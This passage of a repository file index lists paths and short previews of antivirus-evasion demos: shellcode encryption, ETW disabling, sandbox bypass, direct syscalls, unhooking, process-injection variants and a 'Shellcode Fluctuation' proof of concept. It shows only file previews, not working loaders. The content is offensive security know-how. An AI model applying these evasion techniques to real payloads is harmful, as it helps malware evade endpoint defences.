"chars": 193,
"preview": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:Win"
},
{
"path": "chapter4-demo3/demo1/Header.h",
"chars": 734,
"preview": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include <vector>\r\n\r\nconst std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000"
},
{
"path": "chapter4-demo3/demo1/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo3/demo1/base64.h",
"chars": 1161,
"preview": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10"
},
{
"path": "chapter4-demo3/demo1/demo1.cpp",
"chars": 14692,
"preview": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostrea"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj",
"chars": 7998,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj.filters",
"chars": 1509,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo3/demo1/demo1.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "chapter4-demo3/demo1/nt.asm",
"chars": 1585,
"preview": ".code\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nbye :\r\nret\r\n\r\nNtCreateThreadEx PROC\r\n\tmov [rsp +8], rcx ; Save regi"
},
{
"path": "chapter4-demo3/demo1/nt.h",
"chars": 114711,
"preview": "#pragma once\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include <windows.h>\r\n\r\n#define SW3_SEED 0xA8EC79BB\r\n#de"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.exe.recipe",
"chars": 274,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.log",
"chars": 55,
"preview": " demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
},
{
"path": "chapter4-demo3/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
"chars": 143,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.exe.recipe",
"chars": 276,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\last\\dem"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.log",
"chars": 911,
"preview": " demo1.cpp\r\nE:\\last\\demo3\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo3\\"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
"chars": 145,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/unsuccessfulbuild",
"chars": 0,
"preview": ""
},
{
"path": "chapter4-demo3/demo1.sln",
"chars": 1433,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "chapter4-demo4/CODE_OF_CONDUCT.md",
"chars": 5263,
"preview": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nWe as members, contributors, and leaders pledge to make participa"
},
{
"path": "chapter4-demo4/LICENSE.txt",
"chars": 1112,
"preview": "MIT License\n\nCopyright (c) 2021 Mariusz Banach (mgeeky, <mb [at] binary-offensive.com>)\n\nPermission is hereby granted, f"
},
{
"path": "chapter4-demo4/README.md",
"chars": 22936,
"preview": "# Shellcode Fluctuation PoC\n\nA PoC implementation for an another in-memory evasion technique that cyclically encrypts an"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj",
"chars": 7669,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.filters",
"chars": 1281,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.user",
"chars": 411,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/base64.cpp",
"chars": 8233,
"preview": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegge"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/base64.h",
"chars": 1233,
"preview": "#pragma once\r\n//\r\n// base64 encoding and decoding with C++.\r\n// Version: 2.rc.08 (release candidate)\r\n//\r\nconst int XO"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/header.h",
"chars": 2047,
"preview": "#pragma once\n\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\n\ntypedef "
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/main.cpp",
"chars": 18858,
"preview": "\n#include \"header.h\"\n#include <intrin.h>\n#include <random>\n#include \"base64.h\"\n\nHookedSleep g_hookedSleep;\nFluctuationMe"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
"chars": 160,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.exe.recipe",
"chars": 306,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\Shellcod"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.log",
"chars": 141,
"preview": " base64.cpp\r\n main.cpp\r\n 正在生成代码...\r\n ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Debug\\Shell"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate",
"chars": 162,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRele"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.exe.recipe",
"chars": 308,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>E:\\Shellcod"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.log",
"chars": 351,
"preview": " main.cpp\r\n 正在生成代码\r\n 已完成代码的生成\r\n 3 of 350 functions ( 0.9%) were compiled, the rest were copied from previous compil"
},
{
"path": "chapter4-demo4/ShellcodeFluctuation.sln",
"chars": 1447,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3110"
},
{
"path": "demo1/README.md",
"chars": 54,
"preview": "使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀。\r\n\r\n"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/resource.h",
"chars": 380,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by shellcode_execute.rc\r\n\r\n// ¶һĬֵ\r\n// \r"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp",
"chars": 6431,
"preview": "// shellcode_execute.cpp : 此文件包含 \"main\" 函数。程序执行将在此处开始并结束。\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n\r\ntypedef v"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.rc",
"chars": 1203,
"preview": "// Microsoft Visual C++ ɵԴű\r\n//\r\n\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj",
"chars": 6810,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.filters",
"chars": 951,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.user",
"chars": 301,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute.sln",
"chars": 1470,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo2/README.md",
"chars": 116,
"preview": "使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。\r\n\r\ndemo2 使用 CreateThread方式创建新进程极易被拦截,改用EtwpCreateEtwThread加载shellcode,改版的程序为demo3.\r\n"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/App.config",
"chars": 187,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n<configuration>\r\n <startup> \r\n <supportedRuntime version=\"v4.0\" sku="
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/Program.cs",
"chars": 15269,
"preview": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/Properties/AssemblyInfo.cs",
"chars": 985,
"preview": "using System.Reflection;\r\nusing System.Runtime.CompilerServices;\r\nusing System.Runtime.InteropServices;\r\n\r\n// 有关程序集的一般信"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3/shellcode_execut3.csproj",
"chars": 2382,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbu"
},
{
"path": "demo2/shellcode_execut3/shellcode_execut3.sln",
"chars": 1155,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo3/README.md",
"chars": 84,
"preview": "使用静态字符串加密,异或加密,沙箱绕过,EtwpCreateEtwThread上线的技术。\r\n\r\n在SharpInjector的基础上,增加了shellcode的混淆。"
},
{
"path": "demo3/SharpInjector-master/.gitignore",
"chars": 59,
"preview": "*/Debug/*\n*/Release/*\n*/x64/*\n*/bin/*\n*/obj/*\n.vs/*\n*.user\n"
},
{
"path": "demo3/SharpInjector-master/README.md",
"chars": 1911,
"preview": "# SharpInjector\nProject now has a 2nd branch, DInvoke, that implements Reprobate for D/Invoke functionality - 1/15/2022\n"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/App.config",
"chars": 182,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".N"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/Program.cs",
"chars": 2976,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/Properties/AssemblyInfo.cs",
"chars": 1390,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "demo3/SharpInjector-master/ScEncryptor/ScEncryptor.csproj",
"chars": 2448,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/App.config",
"chars": 182,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".N"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateFiber.cs",
"chars": 2157,
"preview": "using System;\nusing System.IO;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Thr"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs",
"chars": 3978,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs",
"chars": 4000,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/CreateThread.cs",
"chars": 1435,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.T"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs",
"chars": 1407,
"preview": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Program.cs",
"chars": 16060,
"preview": "using System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing Syste"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/AssemblyInfo.cs",
"chars": 1394,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs",
"chars": 2846,
"preview": "//------------------------------------------------------------------------------\r\n// <auto-generated>\r\n// 此代码由工具生成。"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.resx",
"chars": 6197,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<root>\r\n <!-- \r\n Microsoft ResX Schema \r\n \r\n Version 2.0\r\n \r\n T"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs",
"chars": 4549,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.Inter"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs",
"chars": 3940,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/SharpInjector.csproj",
"chars": 4663,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbu"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/Shellycode.cs",
"chars": 628,
"preview": "namespace SharpInjector\n{\n\tclass EncryptedShellcode\n\t{\n\t\t// Example calc shellcode\n\t\tpublic string EncSc = \"ypmx+PYrXoQ1"
},
{
"path": "demo3/SharpInjector-master/SharpInjector/WinAPI.cs",
"chars": 8767,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusi"
},
{
"path": "demo3/SharpInjector-master/SharpInjector.sln",
"chars": 2923,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.2990"
},
{
"path": "demo4/syscall/syscall/Syscall.asm",
"chars": 110,
"preview": ".code\r\n\tSysNtCreateFile proc\r\n\t\t\tmov r10, rcx\r\n\t\t\tmov eax, 55h\r\n\t\t\tsyscall\r\n\t\t\tret\r\n\tSysNtCreateFile endp\r\nend"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj",
"chars": 7863,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj.filters",
"chars": 1081,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo4/syscall/syscall/syscall.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo4/syscall/syscall/syscall_call.cpp",
"chars": 1037,
"preview": "#include <Windows.h>\r\n#include \"winternl.h\"\r\n#pragma comment(lib, \"ntdll\")\r\n\r\nEXTERN_C NTSTATUS SysNtCreateFile(\r\n\tPHAND"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.exe.recipe",
"chars": 302,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n <ProjectOutputs>\r\n <ProjectOutput>\r\n <FullPath>C:\\Users\\Ad"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.log",
"chars": 114,
"preview": " Assembling Syscall.asm...\r\n syscall.vcxproj -> C:\\Users\\Admin\\Desktop\\20220617\\syscall\\x64\\Debug\\syscall.exe\r\n"
},
{
"path": "demo4/syscall/syscall/x64/Debug/syscall.tlog/syscall.lastbuildstate",
"chars": 169,
"preview": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebu"
},
{
"path": "demo4/syscall/syscall.sln",
"chars": 1439,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
},
{
"path": "demo5/syscall3/syscall3/1-asm.x64.asm",
"chars": 24410,
"preview": ".code\r\n\r\nEXTERN SW3_GetSyscallNumber: PROC\r\n\r\nEXTERN SW3_GetSyscallAddress: PROC\r\n\r\nNtCreateProcess PROC\r\n\tint 3\r\n\tmov ["
},
{
"path": "demo5/syscall3/syscall3/1.cpp",
"chars": 8559,
"preview": "#include \"1.h\"\r\n#include <stdio.h>\r\n\r\n#define DEBUG\r\n\r\n#define JUMPER\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_clean"
},
{
"path": "demo5/syscall3/syscall3/1.h",
"chars": 13566,
"preview": "#pragma once\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.c"
},
{
"path": "demo5/syscall3/syscall3/syscall3.cpp",
"chars": 116,
"preview": "#include <iostream>\r\n#include \"1.h\"\r\n\r\nint main()\r\n{\r\n NtTestAlert();\r\n\r\n //std::cout << \"Hello World!\\n\";\r\n}"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj",
"chars": 7745,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj.filters",
"chars": 1237,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo5/syscall3/syscall3/syscall3.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo5/syscall3/syscall3.sln",
"chars": 1443,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.3"
},
{
"path": "demo6/unhook_demo/Header.h",
"chars": 821,
"preview": "#pragma once\r\n#include <windows.h>\n#include <iostream>\n#include <sstream>\n#include <iomanip>\n#include <vector>\r\n\r\ntypede"
},
{
"path": "demo6/unhook_demo/unhook_demo.cpp",
"chars": 3563,
"preview": "// unhook_demo.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <i"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj",
"chars": 7669,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj.filters",
"chars": 1087,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "demo6/unhook_demo/unhook_demo.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "demo6/unhook_demo.sln",
"chars": 1451,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.2"
}
]